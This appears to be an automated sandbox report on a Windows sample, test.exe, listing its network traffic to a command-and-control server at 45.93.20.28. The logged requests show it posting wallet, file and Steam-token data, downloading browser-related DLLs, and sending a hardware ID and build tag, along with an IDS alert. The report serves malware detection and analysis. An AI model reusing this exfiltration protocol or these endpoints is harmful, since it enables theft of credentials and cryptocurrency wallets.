              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFBHost: 45.93.20.28Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 2d 2d 0d 0a Data Ascii: ------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="token"1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="file"------BAEBGCFIEHCFIDGCAAFB--
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/freebl3.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/mozglue.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/msvcp140.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/nss3.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/softokn3.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/vcruntime140.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAFHost: 45.93.20.28Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJKEBKFCAAECAAAAAEHost: 45.93.20.28Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 2d 2d 0d 0a Data Ascii: ------KKKJKEBKFCAAECAAAAAEContent-Disposition: form-data; name="token"1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b------KKKJKEBKFCAAECAAAAAEContent-Disposition: form-data; name="message"wallets------KKKJKEBKFCAAECAAAAAE--
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKFHost: 45.93.20.28Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 2d 2d 0d 0a Data Ascii: ------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="token"1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="message"files------IIDHJDGCGDAAKEBGDBKF--
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBFHost: 45.93.20.28Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 2d 2d 0d 0a Data Ascii: ------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="token"1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="file"------JJECGHJDBFIJJJKEHCBF--
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 45.93.20.28Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="message"ybncbhylepme------EGCBFIEHIEGCAAAKKKKE--
              Source: global trafficHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBHost: 45.93.20.28Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CFHDHIJDGCBAKFIEGHCB--
              Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
              Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49717 -> 45.93.20.28:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49743 -> 45.93.20.28:80
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknownTCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJOhywEInP7MAQiFoM0BCMjRzgEIvtXOAQiA1s4BCMjczgEIiuDOAQiu5M4BCIvlzgE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJOhywEInP7MAQiFoM0BCMjRzgEIvtXOAQiA1s4BCMjczgEIiuDOAQiu5M4BCIvlzgE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.93.20.28Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/sqlite3.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/freebl3.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/mozglue.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/msvcp140.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/nss3.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/softokn3.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c66c0eade263c9a8/vcruntime140.dll HTTP/1.1Host: 45.93.20.28Cache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: unknownHTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: 45.93.20.28Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 45 36 34 42 32 30 32 35 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 72 75 6d 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="hwid"58E64B20250F807656615------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="build"trump------KFHJJJKKFHIDAAKFBFBF--
              Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmp, test.exe, 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28
              Source: test.exe, 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.php
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.php)
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpCash
              Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpJ
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpJ:
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000003.1362964366.0000000001803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpStar
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpb:
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpc_qt
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpd
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpdge
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpexodus.conf.jsonni
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpk
              Source: test.exe, 00000000.00000002.1455667853.0000000000C17000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phps
              Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/freebl3.dll
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/mozglue.dll
              Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/mozglue.dllXgl
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/mozglue.dlld
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll#
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll1
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dllE
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dll
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dll6
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dll;
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dll_
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dllata
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dllll
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dllllz
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/nss3.dllowser
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1465195588.000000000BEF2000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/softokn3.dll
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/softokn3.dll5
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/softokn3.dllQ
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/softokn3.dlly
              Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/sqlite3.dll
              Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/sqlite3.dllBg
              Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000002.1465195588.000000000BEF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dll
              Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dllK
